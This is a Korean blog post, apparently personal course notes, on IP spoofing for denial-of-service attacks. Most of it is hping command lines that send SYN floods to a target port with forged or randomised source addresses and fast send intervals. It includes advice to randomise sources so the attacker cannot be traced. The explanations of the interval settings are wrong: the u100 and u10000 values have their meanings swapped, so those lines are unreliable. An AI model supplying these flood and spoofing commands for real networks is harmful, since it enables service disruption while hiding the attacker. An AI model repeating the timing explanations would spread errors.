네트워크 해킹 - 08. IP Spoofing [작업중]
by jennysgapIP spoofing 기술
- DoS(DDoS), smarf Attack 등의 공격 시 공격자 정보를 감추기 위한 수단.
- 주로 데이터를 송신하는 형태의 공격에서 많이 사용됨.
- 공격 목표는 인터넷 구간에 존재하는 경우 효과적임.
- 공격 도구 : netbot Attacker, hping, PC-RAT
# hping [-options] IP_address : TCP를 이용한 ping 명령
# hping 192.168.3.xx
# hping -S 192.168.3.xx : TCP syn 패킷을 이용한 ping
# hping -S -p 22 192.168.3.xx : 특정 포트 서비스 확인
# hping -1 192.168.3.xx : ICMP 프로토콜을 이용한 ping
# hping -2 192.168.3.xx : UDP 프로토콜을 이용한 ping
# hping -2 -p 22 192.168.3.xx : 특정 포트 서비스 확인
# type hping
# type hping3
현재 이건 공격이 아님. 너무 느림 옵션을 붙여야 공격이 됨!!
smarf attack
LAND ATTack - cpu 중 i 가 들어간 것은 잘 안당한다. 그 전버전에 이용
Dos를 사용할 때, 핵심은 IP를 속여라!!!
<spoofing>
속일_IP 공격_IP
# hping -S -p 21 -a 192.168.3.X 192.168.3.XX : -a로 내 IP를 속일 수 있음 (타겟2명)
# hping -S -p 21 192.168.3.XX --rand-source : 1개 특정IP만 사용하면 추적올 수 있으니 임의IP로 찍으며 보냄. (타겟1명)
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u100 : 보내는 속도 조절 0.01초
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u1000 : 보내는 속도 조절 0.001초 **
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u10000 : 보내는 속도 조절 0.0001초
이정도는 되어야 DoS 공격이라고 할 수 있음
'BOX' 카테고리의 다른 글
네트워크 해킹 - 10. 원격제어를 이용한 공격 (Radmin) (0) | 2016.12.06 |
---|---|
네트워크 해킹 - 09. 원격제어를 이용한 공격 (NetCat) (0) | 2016.12.06 |
네트워크 해킹 - 07. TCP Sequence Guess[작업중] (0) | 2016.12.06 |
네트워크 해킹 - 06. DNS Spoofing (0) | 2016.12.06 |
네트워크 해킹 - 05. Netbus (0) | 2016.12.06 |
블로그의 정보
jennysgap
jennysgap